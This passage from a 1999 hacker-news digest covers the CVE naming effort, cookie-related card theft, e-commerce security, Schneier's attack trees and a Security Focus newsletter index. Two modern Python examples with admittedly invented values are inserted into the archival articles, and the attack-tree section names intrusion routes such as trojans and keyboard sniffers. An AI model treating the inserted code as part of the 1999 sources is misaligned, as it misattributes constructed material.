weaknesses they attack vary widely and are far more difficult to classify.
Consider the various names given for a type of code used by many Web sites
known as the ''common gateway interface,'' or cgi, generally used to connect
the site to on-line sources such as telephone directories.
Altering such code can cause big disruptions to the sites, a weakness known
as ''CA-96.06.cgi-example code'' by CERT, a well-known computer-security
center at Carnegie Mellon
University. Meanwhile CyberSafe Corp., an Internet security firm based in
Issaquah, Wash., discusses the same weakness as an ''HTTP `phf' Attack.''
While both continue to use those names, they also have begun to include in
their advisories the name chosen by Mitre for the condition:
''CVE-1999-0067,'' meaning that the problem was the 67th identified under
the CVE effort this year.
Eventually they might drop their own terminologies altogether, said Bill Fithen,
a CERT security analyst. ''If CVE catches on, there might truly be no
legitimate reason to continue'' using older names, he said.
For Mitre, CVE represents a chance to show off the commercial benefits of
its work for government agencies. Founded in 1958 by a group of
researchers formerly associated with MIT's Lincoln Laboratories, Mitre has
chiefly been known as a contractor on aerospace and classified military
projects, with offices from Fort Leavenworth, Kan., and Washington, D.C.,
to Seoul.
The company also has branched out into the civilian sector and now runs
research centers for the Federal Aviation Administration and the Internal
Revenue Service. In 1996 Mitre spun off divisions that did research in space,
environment, and telecommunications. It still has about 4,000 employees
worldwide and reported revenue of $542 million for its latest fiscal year.
At the behest of the Pentagon, Mitre several years ago began research in
areas of ''critical infrastructure protection''; 15 of the company's employees
now are involved in a FBI anti-hacking center in Washington, D.C.
The CVE is rooted in such work, dreamed up by Mann after he was assigned
last year to create a database to protect the company's computers.
Mann wanted to automatically compare alerts issued by CERT and other
security groups with an analysis of traffic on Mitre's computers, but Mitre's
programmers were using different terms. ''I realized we needed a way to put
these things together,'' said Mann, 37, who holds a doctorate in mathematics
and once taught at a US Navy postgraduate program in California.
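The matching problem Mann describes, as an added example (not Mitre's code or anything from the article): advisories from different sources name the same weakness differently, and only a shared CVE name lets a tool pair an advisory with a finding from traffic analysis automatically. The CERT and CyberSafe names and CVE-1999-0067 are the ones the article quotes; the third source, the signature names and the findings are constructed.

```python
"""Correlating advisories and traffic-analysis findings by CVE name.

Added example. Each advisory carries its source's own local name plus free
text that may or may not cite a CVE name. Findings from a constructed
traffic-analysis tool likewise carry a references field. Anything citing a
CVE name can be matched across sources; anything without one cannot.
"""
import re
from collections import defaultdict

# CVE names: "CVE-", a four-digit year, then a sequence of at least four digits.
CVE_RE = re.compile(r"\bCVE-(\d{4})-(\d{4,})\b", re.IGNORECASE)


def cve_names(text):
    """Distinct CVE names cited in free text, normalised to upper case."""
    return sorted({m.group(0).upper() for m in CVE_RE.finditer(text)})


def build_index(advisories):
    """Return (by_cve, unnamed).

    by_cve maps each CVE name to the (source, local name) pairs that cite it,
    so two write-ups of the same weakness end up under one key. Advisories
    citing no CVE go to `unnamed`: they are outside the common vocabulary.
    """
    by_cve = defaultdict(list)
    unnamed = []
    for adv in advisories:
        names = cve_names(adv["text"])
        key = (adv["source"], adv["name"])
        if not names:
            unnamed.append(key)
            continue
        for cve in names:
            by_cve[cve].append(key)
    return dict(by_cve), unnamed


def match_findings(findings, by_cve):
    """Pair each finding with every advisory that shares one of its CVE names.

    Returns (matched, unmatched). matched holds (host, signature, [(cve,
    [(source, local name), ...])]); unmatched holds findings whose references
    resolve to no advisory at all.
    """
    matched, unmatched = [], []
    for finding in findings:
        hits = [(cve, by_cve.get(cve, [])) for cve in cve_names(finding["refs"])]
        if any(advs for _, advs in hits):
            matched.append((finding["host"], finding["signature"], hits))
        else:
            unmatched.append(finding)
    return matched, unmatched


# Constructed advisories; the phf names and CVE number follow the article.
ADVISORIES = [
    {"source": "CERT", "name": "CA-96.06.cgi-example code",
     "text": "Vulnerable example CGI code (phf). Also known as CVE-1999-0067."},
    {"source": "CyberSafe", "name": "HTTP `phf' Attack",
     "text": "The phf script passes unfiltered input to a shell. See cve-1999-0067."},
    {"source": "VendorX (constructed)", "name": "WEB-MISC signature 42",
     "text": "Proprietary check; no public identifier assigned."},
]

# Constructed findings as a traffic-analysis tool might report them.
FINDINGS = [
    {"host": "www-1", "signature": "phf-cgi-probe", "refs": "CVE-1999-0067"},
    {"host": "www-2", "signature": "proprietary-check-42", "refs": ""},
]


def run():
    """Index the advisories and match the findings against them."""
    by_cve, unnamed = build_index(ADVISORIES)
    matched, unmatched = match_findings(FINDINGS, by_cve)
    return by_cve, unnamed, matched, unmatched


if __name__ == "__main__":
    by_cve, unnamed, matched, unmatched = run()
    for cve, keys in by_cve.items():
        print(cve, "is known as:", "; ".join(f"{s}: {n}" for s, n in keys))
    print("advisories outside the common vocabulary:", unnamed)
    for host, sig, hits in matched:
        print(f"{host} {sig} -> {hits}")
    print("findings with no matching advisory:", [f["host"] for f in unmatched])
```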
Mann developed the idea with Christey, 32, a senior software engineer, and
last January they presented a paper at a conference at Purdue University in
Indiana, sparking broader commercial interest.
Now many attendees of that conference are members of CVE's 25-member
editorial board made up of software vendors, analysts, and academics, and
headed by Christey. So far the group has agreed to assign numbers to about
320 vulnerabilities, and hopes to get to 665 by the end of the year.
Like many business consortiums, the CVE board also includes members who
aren't so enthusiastic. Some worry their competitors will learn their secrets.
''CVE will only contain vulnerabilities that are old or not interesting,'' said
Marcus Ranum, chief executive of closely held Network Flight Recorder in
Woodbine, Md. To monitor possible breakthroughs Ranum has assigned an
employee to join the CVE board, which holds conference calls periodically to
discuss new entries. But the board member won't give away too much,
Ranum says.
''It puts me in a delicate spot as a vendor,'' he said. ''If I were going to make
CVE useful I'd give all my information to CVE. But then my competitors
would have it and my shareholders would kill me.''
But other CVE participants say they hope the list will demystify their work to
corporate customers and boost sales.
''Generally people can get pretty confused when you try to sell them
software,'' said Andre Frech, a researcher at Internet Security Systems in
Atlanta, which recently began including CVE numbers in a detection
database.
Internet Security Systems' founder, Christopher Klaus, says the CVE might
someday even become the basis of ''hacker insurance'' policies for companies
to minimize the impact of technical disruptions. Without CVE or something
like it, he said, ''it would be hard even to set the premiums ... because people
couldn't be specific enough about what they might be selling.''
If CVE catches on, it will please specialists who have tried to develop more
complex classification schemes with little notice, like Eugene Spafford, a
computer scientist at Purdue who ran the conference where Mann and
Christey first presented their paper.
Four years ago Spafford began building his own open database of computer
security flaws, but found few companies could agree on organizing criteria. In
contrast, he said, CVE has already achieved ''a lot more buy-in than has
happened in the past.''
This story ran on page C01 of the Boston Globe on 12/01/99.
© Copyright 1999 Globe Newspaper Company.
@HWA
19.0 Novell Head Victim of Online Credit Card Theft
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Weld Pond
Novell chief Eric Schmidt has admitted that he has been
the victim of credit card theft. Speaking at San
Francisco's Digital Economy conference he blamed the
theft of his personal information on browser cookies. He
labeled cookies as "the biggest disaster for computers in
the past [few] years."
ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2403346,00.html?chkpt=zdnntop
Novell chief's credit card stolen online
Eric Schmidt blames cookies for cyber theft --
calls cookies 'one of the biggest disasters for
computers.'
By Ben Elgin, Sm@rt Reseller
UPDATED December 2, 1999 3:26 PM PT
Novell chief Eric Schmidt knows firsthand the
problem of Internet fraud.
Speaking at San Francisco's Digital Economy conference
Thursday, Schmidt informed the crowd that his credit card
number had been stolen over the Internet in the past.
Although he isn't sure exactly how his card number was
lifted, Schmidt says he believes it was through a
mechanism that reads cookies, the files sitting on a user's
desktop that store personal information, such as
passwords and preferences.
"Cookies are one of the biggest disasters for computers in the
past [several] years," says Schmidt, citing the lack of
security and the blatant breach of consumer privacy.
As Novell's chairman and CEO,
Schmidt is trying to oust cookies with his company's new
"digitalme" online identification-management service.
Based on Novell Directory Services technology, digitalme
is aiming to store and consolidate a user's multiple
passwords, address books, favorites lists and purchasing
preferences.
"Cookies are a great idea, [but] they are just stored in the
wrong place," says Schmidt.
Schmidt's brush with cyber thieves may have left him
wary, but not a whole lot poorer. "My liability was $50 ...
[but] I'm not sure what the credit card company's liability
was," he says.
@HWA
20.0 IDC Says E-Commerce Unsafe Most of the Time
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Deepquest
The most recent Technology Integration Panel Study,
conducted by International Data Corporation paints a
grim picture of online security. Consumers have worried
about the security of their online transactions, and this
study seems to justify those fears. The study, entitled
"E-Commerce Solutions: Customer Directions and
Segmentation by Company Size and Industry", explores
various market segments currently using e-commerce
systems and what the potential is for the future.
(Unfortunately the data for this study is already six
months old and had an extremely small sample size.
Hopefully a more comprehensive study can be
conducted soon.)
South China Morning Post
http://www.technologypost.com/enterprise/DAILY/19991202103702261.asp?Section=Main
Published on Thursday, December 2, 1999
ENTERPRISE
Online transactions are
not all secure, says study
NEWSBYTES
Consumers have worried about the security of their
online transactions, and a new study by International
Data Corporation (IDC) justifies their fears.
According to IDC's most recent Technology Integration
Panel Study, one in five large companies (those having
1,000 or more employees) is likely not to have a secure
transaction option available. In small companies, (10-99
employees) the ratio of firms not having a secure
transaction option rises to one in three.
"Information technology is again changing the business
landscape, offering the potential for better products and
services delivered to corporations, governments, and
consumers alike through the engineering of e-solutions,"
said Carey Azzara, program director of IDC's
"Corporate Computing: Vertical Views" research.
"However, realising this potential is not easy and
certainly not without pitfalls for the vendors trying to
bring the world into this new paradigm."
Mr Azzara emphasised the point that unless companies
have a secure means of accepting payment for a
transaction, whether that transaction is e-retail or
business-to-business, they are not engaging in
e-commerce; rather, they are engaging in e-business,
which is not the same.
"I will pick a secure server all the time," Mr Azzara said
when discussing how payment is to be made online. Under
no circumstances, he cautioned, should credit card
numbers be given in a non-secure environment.
In fact he would not accept a secure-transaction logo on
a Web site, but would make sure that the online
merchant's server was really secure with encryption and
authentication capabilities.
Over 40 per cent of the survey's respondents reported
that they paid a premium for better e-commerce system
performance. The study found Microsoft had the largest
hold on the market, but Netscape, IBM, and Oracle
were seriously considered by 25 per cent of the
responding companies.
The full study, entitled "E-Commerce Solutions:
Customer Directions and Segmentation by Company
Size and Industry", explores the market segments
currently using e-commerce systems and how the
potential for future business is shaping up.
The study, conducted during July 1999, sampled 974
US and Canadian companies, stratified by size and
industry, and was weighted to reflect information and
communication technology of each marketplace.
Mr Azzara said consumers should "go ahead, make the
phone call" when passing over credit card information
unless the security of the site was established.
The message of the survey, he said, is: "Buyer beware!
Don't be a victim."
Additional information about IDC is available at
www.idc.com.
Copyright (c) Post-Newsweek Business Information, Inc.
All rights reserved.
@HWA
21.0 Attack Trees Help to Model Security Threats
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Evil Wench
With new security weakness showing up on a daily basis
how do you model threats against computer systems?
Bruce Schneier has come up with a formal methodology
for analyzing the security of systems and subsystems,
known as 'Attack Trees'.
Dr. Dobb's Journal
http://www.ddj.com/articles/1999/9912/9912a/9912a.htm
Attack Trees
Dr. Dobb's Journal December 1999
Modeling security threats
By Bruce Schneier
Bruce is the CTO of Counterpane Internet Security, author of Applied
Cryptography, Second Edition (John Wiley & Sons, 1995), and inventor of
the Blowfish and Twofish encryption algorithms. You can contact Bruce at
http://www.counterpane.com/.
Few people truly understand computer security, as illustrated by
computer-security company marketing literature that touts "hacker proof
software," "triple-DES security," and the like. In truth, unbreakable
security is broken all the time, often in ways its designers never
imagined. Seemingly strong cryptography gets broken, too. Attacks thought
to be beyond the ability of mortal men become commonplace. And as
newspapers report security bug after security bug, it becomes increasingly
clear that the term "security" doesn't have meaning unless you also know
things like "Secure from whom?" or "Secure for how long?"
Clearly, what we need is a way to model threats against computer systems.
If we can understand all the different ways in which a system can be
attacked, we can likely design countermeasures to thwart those attacks.
And if we can understand who the attackers are -- not to mention their
abilities, motivations, and goals -- maybe we can install the proper
countermeasures to deal with the real threats.
Enter Attack Trees
Attack trees provide a formal, methodical way of describing the security
of systems, based on varying attacks. Basically, you represent attacks
against a system in a tree structure, with the goal as the root node and
different ways of achieving that goal as leaf nodes.
Figure 1, for instance, is a simple attack tree against a physical safe.
The goal is opening the safe. To open the safe, attackers can pick the
lock, learn the combination, cut open the safe, or install the safe
improperly so that they can easily open it later. To learn the
combination, they either have to find the combination written down or get
the combination from the safe owner. And so on. Each node becomes a
subgoal, and children of that node are ways to achieve that subgoal. (Of
course, this is just a sample attack tree, and an incomplete one at that.
How many other attacks can you think of that would achieve the goal?)
Note that there are AND nodes and OR nodes (in the figures, everything
that isn't an AND node is an OR node). OR nodes are alternatives -- the
four ways to open a safe, for example. AND nodes represent different steps
toward achieving the same goal. To eavesdrop on someone saying the safe
combination, attackers have to eavesdrop on the conversation AND get safe
owners to say the combination. Attackers can't achieve the goal unless
both subgoals are satisfied.
That's the basic attack tree. Once you have it completed, you can assign
values -- I (impossible) and P (possible) in Figure 1 -- to the various
leaf nodes, then make calculations about the nodes. (Again, this is only
an illustrative example; do not take the values as an indication of how
secure my safe really is.) Once you assign these values -- presumably this
assignment will be the result of painstaking research on the safe itself
-- you can calculate the security of the goal. The value of an OR node is
possible if any of its children are possible, and impossible if all of its
children are impossible. The value of an AND node is possible only if all
children are possible, and impossible otherwise; see Figure 2.
The dotted lines in Figure 2 show all possible attacks -- a hierarchy of
possible nodes, from a leaf to the goal. In this sample system, there are
two possible attacks: Cutting open the safe, or learning the combination
by bribing the owner of the safe. With this knowledge, you know exactly
how to defend this system against attack.
Assigning "possible" and "impossible" to the nodes is just one way to look
at the tree. Any Boolean value can be assigned to the leaf nodes and then
propagated up the tree structure in the same manner: easy versus
difficult, expensive versus inexpensive, intrusive versus nonintrusive,
legal versus illegal, special equipment required versus no special
equipment. Figure 3 shows the same tree with another Boolean node value.
Assigning "expensive" and "not expensive" to nodes is useful, but it would
be better to show exactly how expensive. It is also possible to assign
continuous values to nodes. Figure 4 shows the tree with different costs
assigned to the leaf nodes. Like Boolean node values, these can propagate
up the tree as well. OR nodes have the value of their cheapest child; AND
nodes have the value of the sum of their children. In Figure 4, the costs
have propagated up the tree, and the cheapest attack has been highlighted.
Again, this tree can be used to determine where a system is vulnerable.
Figure 5 shows all attacks that cost less than $100,000. If you are only
concerned with attacks that are less expensive (maybe the contents of the
safe are only worth $100,000), then you should only concern yourself with
those attacks.
There are many other possible continuous node values, including
probability of success of a given attack, likelihood that an attacker will
try a given attack, and so on.
Nodes and Their Values
In any real attack tree, nodes will have many different values
corresponding to many different variables, both Boolean and continuous.
Different node values can be combined to learn even more about a system's
vulnerabilities. Figure 6, for instance, determines the cheapest attack
requiring no special equipment. You can also find the cheapest low-risk
attack, most likely nonintrusive attack, best low-skill attack, cheapest
attack with the highest probability of success, most likely legal attack,
and so on. Every time you query the attack tree about a certain
characteristic of attack, you learn more about the system's security.
To make this work, you must marry attack trees with knowledge about
attackers. Different attackers have different levels of skill, access,
risk aversion, money, and so on. If you're worried about organized crime,
you have to worry about expensive attacks and attackers who are willing to
go to jail. If you are worried about terrorists, you also have to worry
about attackers who are willing to die to achieve their goal. If you're
worried about bored graduate students studying the security of your
system, you usually don't have to worry about illegal attacks such as
bribery and blackmail. The characteristics of your attacker determine
which parts of the attack tree you have to worry about.
Attack trees also let you play "what if" games with potential
countermeasures. In Figure 6, for example, the goal has a cost of $20,000.
This is because the cheapest attack requiring no special equipment is
bribing the person who knows the combination. What if you implemented a
countermeasure -- paying that person more so that he is less susceptible
to bribes? If you assume that the cost to bribe him is now $80,000 (again,
this is an example; in the real world you'd be expected to research
exactly how a countermeasure affects the node value), then the cost
increases to $60,000 (presumably to hire the thugs to do the threatening).
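The propagation rules described above (Boolean AND/OR values in Figure 2, cheapest-child and summed costs in Figure 4, the cost threshold of Figure 5, the combined "cheapest attack with no special equipment" query of Figure 6, and the countermeasure what-if just discussed) can all be run against one small tree. The following Python is an added example, not code from the article or from Counterpane; the safe tree, its node names and every cost and possible/impossible value in it are constructed for illustration and are not the values in the article's figures, and the function names (is_possible, cheapest, attack_paths, attacks_under, what_if) are this example's own.

```python
# Attack-tree evaluation as the article describes it: Boolean values propagate
# as AND/OR, costs as sum/min, and queries combine them.  Added example; the
# safe tree below and every node value in it are constructed for illustration.
from dataclasses import dataclass, field
from typing import Callable, List, Optional

@dataclass
class Node:
    name: str
    kind: str = "OR"                       # "OR": alternatives; "AND": every child required
    children: List["Node"] = field(default_factory=list)
    possible: Optional[bool] = None        # leaf-only attributes; interior nodes derive them
    cost: Optional[int] = None             # dollars
    special_equipment: bool = False

def leaf(name: str, possible: bool, cost: int, special: bool = False) -> Node:
    return Node(name, possible=possible, cost=cost, special_equipment=special)

def is_possible(node: Node) -> bool:
    """Figure 2 rule: OR is possible if any child is; AND only if all children are."""
    if not node.children:
        return bool(node.possible)
    vals = [is_possible(c) for c in node.children]
    return all(vals) if node.kind == "AND" else any(vals)

def cheapest(node: Node, allowed: Callable[[Node], bool] = lambda n: True):
    """Figure 4/6 rule: OR takes its cheapest child, AND sums its children.
    `allowed` filters leaves; returns (cost, [leaf names]) or None if nothing qualifies."""
    if not node.children:
        return (node.cost, [node.name]) if allowed(node) else None
    opts = [cheapest(c, allowed) for c in node.children]
    if node.kind == "AND":
        if any(o is None for o in opts):
            return None
        return sum(o[0] for o in opts), [n for o in opts for n in o[1]]
    opts = [o for o in opts if o is not None]
    return min(opts, key=lambda o: o[0]) if opts else None

def attack_paths(node: Node) -> List[List[Node]]:
    """Every complete attack (the dotted lines of Figure 2) as its list of leaves:
    an OR node yields each child's paths, an AND node the product of its children's."""
    if not node.children:
        return [[node]]
    if node.kind == "OR":
        return [p for c in node.children for p in attack_paths(c)]
    paths: List[List[Node]] = [[]]
    for c in node.children:
        paths = [p + q for p in paths for q in attack_paths(c)]
    return paths

def possible_attacks(node: Node) -> List[List[str]]:
    """The attacks that is_possible() counts, listed step by step."""
    return [[l.name for l in p] for p in attack_paths(node) if all(l.possible for l in p)]

def attacks_under(node: Node, budget: int) -> List[List[str]]:
    """Figure 5 query: every attack whose total cost is below `budget`."""
    return [[l.name for l in p] for p in attack_paths(node) if sum(l.cost for l in p) < budget]

def no_special_equipment(n: Node) -> bool:
    return not n.special_equipment

def what_if(tree: Node, leaf_name: str, new_cost: int, allowed=no_special_equipment):
    """Countermeasure what-if: change one leaf's cost and recompute the cheapest allowed attack."""
    before = cheapest(tree, allowed)
    target = next(l for p in attack_paths(tree) for l in p if l.name == leaf_name)
    target.cost = new_cost
    return before, cheapest(tree, allowed)

def safe_tree() -> Node:
    """The safe example in outline form; all values are constructed, not the figures'."""
    from_owner = Node("get combination from owner", "OR", [
        leaf("threaten owner", False, 60_000),
        leaf("blackmail owner", False, 100_000),
        Node("eavesdrop on owner", "AND", [
            leaf("listen to conversation", True, 20_000, special=True),
            leaf("get owner to state combination", False, 60_000),
        ]),
        leaf("bribe owner", True, 20_000),
    ])
    return Node("open safe", "OR", [
        leaf("pick lock", False, 30_000, special=True),
        Node("learn the combination", "OR",
             [leaf("find written combination", False, 75_000), from_owner]),
        leaf("cut open safe", True, 10_000, special=True),
        leaf("install improperly", False, 100_000),
    ])

if __name__ == "__main__":
    t = safe_tree()
    print("goal possible:", is_possible(t))                           # True
    print("possible attacks:", possible_attacks(t))                   # bribe; cut open
    print("cheapest overall:", cheapest(t))                           # (10000, ['cut open safe'])
    print("cheapest, no special equipment:", cheapest(t, no_special_equipment))
    print("attacks under $100,000:", attacks_under(t, 100_000))
    print("bribe raised to $80,000:", what_if(t, "bribe owner", 80_000))  # -> threaten, 60000
```

With these constructed values the cheapest attack overall is cutting the safe open, but it needs special equipment, so the cheapest attack without it is the $20,000 bribe; raising the bribe cost to $80,000 moves the answer to threatening the owner at $60,000, which is the same shape of result the article's what-if describes. Because the Boolean and cost propagation are written as two separate passes over the same tree, any other leaf attribute the article lists (legal/illegal, intrusive/nonintrusive, probability of success) can be added as one more field and one more `allowed` predicate or propagation rule.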
A PGP Example
Figure 7 is an attack tree for the popular PGP e-mail security program.
Since PGP is a complex program, this is a complex tree, and it's easier to
write it in outline form than graphically. PGP has several security
features, so this is only one of several attack trees for PGP. This
particular attack tree has "read a message encrypted with PGP" as its
goal. Other goals might be: "forge someone else's signature on a message,"
"change the signature on a message," "undetectably modify a PGP-signed or
PGP-encrypted message," and so on.
What immediately becomes apparent from the attack tree is that breaking
the RSA or IDEA encryption algorithms are not the most profitable attacks
against PGP. There are many ways to read someone's PGP-encrypted messages
without breaking the cryptography. You can capture their screen when they
decrypt and read the messages (using a Trojan horse like Back Orifice, a
TEMPEST receiver, or a secret camera), grab their private key after they
enter a passphrase (Back Orifice again, or a dedicated computer virus),
recover their passphrase (a keyboard sniffer, TEMPEST receiver, or Back
Orifice), or simply try to brute force their passphrase (I can assure you
that it will have much less entropy than the 128-bit IDEA keys that it
generates). In the scheme of things, the choice of algorithm and the key
length is probably the least important thing that affects PGP's overall
security. PGP not only has to be secure, but it has to be used in an
environment that leverages that security without creating any new
insecurities.
Creating Attack Trees
How do you create an attack tree like this? First, you identify the
possible attack goals. Each goal forms a separate tree, although they
might share subtrees and nodes. Then, try to think of all attacks against
each goal. Add them to the tree. Repeat this process down the tree until
you are done. Give the tree to someone else, and have him think about the
process and add any nodes he thinks of. Repeat as necessary, possibly over
the course of several months. Of course there's always the chance that you
forgot about an attack, but you'll get better with time. Like any security
analysis, creating attack trees requires a certain mindset and takes
practice.
Once you have the attack tree, and have researched all the node values
(these values will change over time, both as attacks become easier and as
you get more exact information on the values), you can use the attack tree
to make security decisions. You can look at the values of the root node to
see if the system's goal is vulnerable to attack. You can determine if the
system is vulnerable to a particular kind of attack; password guessing,
for instance. You can use the attack tree to list the security assumptions
of a system; for example, the security of PGP might assume that no one
could successfully bribe the programmers. You can determine the impact of
a system modification or a new vulnerability discovery: Recalculate the
nodes based on the new information and see how the goal node is affected.
And you can compare and rank attacks -- which is cheaper, which is more
likely to succeed, and the like.
One of the surprising things that comes out of this kind of analysis is
that the areas people think of as vulnerable usually aren't. With PGP, for
example, people generally worry about key length. Should they use 1024-bit
RSA or 2048-bit RSA? Looking at the attack tree, though, shows that the
key length of RSA doesn't really matter. There are all sorts of other
attacks -- installing a keyboard sniffer, modifying the program on the
victim's hard drive -- that are much easier than breaking the RSA public
key. Increasing the key length from 1024 bits to 2048 bits is like putting
an enormous stake into the ground and hoping the enemy runs right into it,
as opposed to building a lower palisade around the target. Attack trees
give you perspective on the whole system.
One of the things that really makes attack trees valuable is that they
capture knowledge in a reusable form. Once you've completed the PGP attack
tree, you can use it in any situation that uses PGP. The attack tree
against PGP becomes part of a larger attack tree. For example, Figure 8
shows an attack tree whose goal is to read a specific message that has
been sent from one Windows 98 computer to another. If you look at the root
nodes of the tree, the entire attack trees for PGP and for opening a safe
fit into this attack tree.
This scalability means that you don't have to be an expert in everything.
If you're using PGP in a system, you don't have to know the details of the
PGP attack tree; all you need to know are the values of the root node. If
you're a computer-security expert, you don't have to know the details
about how difficult a particular model of safe is to crack; you just need
to know the values of the root node. Once you build up a library of attack
trees against particular computer programs, door and window locks, network
security protocols, or whatever, you can reuse them whenever you need to.
For a national security agency concerned about compartmentalizing attack
expertise, this kind of system is very useful.
Conclusion
Attack trees provide a formal methodology for analyzing the security of
systems and subsystems. They provide a way to think about security, to
capture and reuse expertise about security, and to respond to changes in
security. Security is not a product -- it's a process. Attack trees form
the basis of understanding that process.
DDJ
@HWA
22.0 Pandora Updated
~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Simple Nomad
Jitsu-Disk finished moving the Pandora Linux code so
that Pandora Linux uses libpcap and libnet. Pandora is a
set of tools for testing the security and insecurity of
Novell Netware. A number of problems have been
corrected from the beta release on November 19th,
including several problems involving spoofing and
sniffing. Libnet helped Jitsu fix all that. The
documentation has also been updated, including all the
code used to do the builds, and pre-compiled binaries,
all wrapped up in a nice big tarball.
Nomad Mobile Research Center
http://www.nmrc.org/pandora/
@HWA
23.0 [sSh] Busted or Not?
~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Ender
Numerous contradictory reports about the raids and
arrests of YTCracker and Darkness of [sSh] have been
received by HNN and other sources. It is pretty clear at
this time that YTCracker has not been arrested, yet.
(He feels that it is only a matter of time.) OSALL has
been trying to keep track of the rumors and innuendoes
and get accurate information regarding this breaking
story or non-story.
OSALL
http://www.aviary-mag.com/News/SSH_Busts/ssh_busts.html
[sSh] Busts
12/02/99
Mike Hudack
Editor-in-Chief
Note: The following information is presented as best as possible.
Contradictions have been streaming into the OSAll headquarters from two
FBI agents, numerous Web site defacers and several other people. All
claim to know what's going on, but all contradict each other. We're
leaving this story intact for now, until the dust settles and we can determine
the facts of the case, as it were.
Correction: YTCracker has not been raided.
OSAll spoke with YTCracker at 1:00pm eastern time, confirming that he
had not been raided by the FBI or any other government agency.
Previous reports published on OSAll and HNN stated that YTCracker
had been raided, citing rumors and, in one case on OSAll, an anonymous
FBI source. It appears that these reports were incorrect.
As of right now it has been confirmed that Darkness has been visited by
NASA investigative authorities. FBI visits have not been confirmed but
have been mentioned by an anonymous FBI source.
The validity and reliability of this FBI source is being called into question as
more evidence comes to light.
The source expects "a number of groups to fall soon" but gave no timeline
or even a guarantee of further arrests.
The FBI has already seized logs relating to a number of attacks, including
visiting an ISP that one defacer funneled his attacks through.
Both the FBI and US Attorney's Office have denied official comment on
an "ongoing investigation."
@HWA
24.0 Response to Freedom Extraordinary
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Jordan
Thursday's long anticipated launch of Freedom 1.0 by
Zero Knowledge Systems has proved to be an
extraordinary success. Freedom works seamlessly
alongside your favorite browser and other Internet
applications. You can surf the web, send email, chat,
telnet, and participate in newsgroups as you normally
would, only now with complete confidence that your
personal information is not being collected without your
consent. Freedom identifies you on the net with a 'nym'
that you choose. There can be only one 'nym' so you
may want to reserve your online identity as soon as you
can.
Freedom 1.0
http://www.zks.net/clickthrough/click.asp?partner_id=542
@HWA
25.0 DCypher.net Team Created
~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by dcypher
A team for the Hacker News Network has been created
at DCypher.net. DCypher.Net has accepted the CS
Group's CS-Cipher challenge and will attempt to break
their 56 bit key using a brute force attack in a
distributed computing effort. They promise to give the
entire $10,500 prize to whoever actually finds the
correct key. (Now that is a pretty strong incentive.)
DCypher.net
http://www.dcypher.net/
HNN Stats at DCypher.net TeamID:131
Don't forget about our team over at SETI@Home, the
search for extraterrestrial life.
SETI@Home
http://setiathome.ssl.berkeley.edu/
HNN SETI@Home Team Stats
http://setiathome.ssl.berkeley.edu/stats/team/team_2251.html
@HWA
26.0 Hackers Make it to Mars
~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Desolationroad
At approximately 12 Noon PST on Friday December 3rd,
1999 a 42 square foot (3.816 sq meters) extremely
dense ball of complicated electronics will arrive at the
end of its twelve month journey. The 1,270 pounds (576
kg) mass of extremely sophisticated cutting edge
technology will crash land onto the surface of an
extraterrestrial location. (Now that's a damn hack if I
ever heard of one.)
Jet Propulsion Laboratory
http://marslander.jpl.nasa.gov/index.html
@HWA
27.0 Security Focus Newsletter #17
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Security Focus Newsletter #17
Table of Contents:
I. INTRODUCTION
II. BUGTRAQ SUMMARY
1. NetTerm FTP Server Multiple Vulnerabilities
2. Microsoft IE5 XML HTTP Redirect Vulnerability
3. Sun Java IDE Webserver IP Restriction Failure Vulnerability
4. Vermillion FTPd CWD DoS Vulnerability
5. Mdaemon WebConfig Overflow DoS Vulnerability
6. Cabletron SSR ARP Flood DoS Vulnerability
7. Netscape Navigator Long ASP Argument Vulnerability
8. Deerfield WorldClient Long URL DoS Vulnerability
9. SCO Xsco Buffer Overflow Vulnerability
10. SCO xlock(1) (long username) Buffer Overflow Vulnerability
11. SCO su(1) Buffer Overflow Vulnerability
III. PATCH UPDATES
1. Vulnerability Patched: Linux syslogd Denial of Service
2. Vulnerability Patched: Solaris rpc.ttdbserver Denial of Service
3. Vulnerability Patched: Cabletron SSR ARP Flood DoS
4. Vulnerability Patched: SCO su(1) Buffer Overflow
5. Vulnerability Patched: Pine Environment Variable Expansion in URLS
IV. INCIDENTS SUMMARY
1. Re: Port 137 and snmp scans (Thread)
2. SunOS rpcbind scans (Thread)
3. Re: cracker probing 1542 (Thread)
4. Re: rpc logging (Thread)
5. SANS and CERT ICMP advisories (Thread)
6. Fw: unsolicited connection(s) (Thread)
7. F5's 3DNS signature + Cisco Distrib Dir (Thread)
8. Insane amount of probes from 216.212.in-addr.arpa (tin.it) (Thread)
9. BIND Scanning (Thread)
10. sweep (Thread)
11. pop3/imap crawler.. (Thread)
12. UK Law & Cases Re Malicious action/attacks (Thread)
13. cgi attack
14. Re: problems from ip69.net247221.cr.sk.ca[24.72.21.69] (Thread)
15. Port 98 scans & new 3128/8080 scans
V. VULN-DEV RESEARCH LIST SUMMARY
1. Re: icq accounts (Thread)
2. Re: WordPad/riched20.dll buffer overflow (Thread)
3. SSH exploit (Thread)
4. lanma256.bmp/lanmannt.bmp security risk? (Thread)
5. Re: development of wordpad exploit (Thread)
VI. SECURITY JOBS
Seeking Staff:
1. SecurityFocus.com is looking for staff writers for a Windows NT column!
2. NYC - Internet Security Position
3. Security Research Engineer
VII. SECURITY SURVEY RESULTS
VIII. SECURITY FOCUS TOP 6 TOOLS
1. SecurityFocus.com Pager (Win95/98/NT)
2. Lookout (Windows 2000, Windows 95/98 and Windows NT)
3. cgicheck99 0.4 (Any system supporting rebol)
4. HookProtect (Windows 95/98 and Windows NT)
5. Sun Enterprise Network Security Service Early Access 1 (Java)
6. Pandora for Linux v4 beta 2 (Linux)
IX. SPONSOR INFORMATION - CORE SDI
X. SUBSCRIBE/UNSUBSCRIBE INFORMATION
I. INTRODUCTION
-----------------
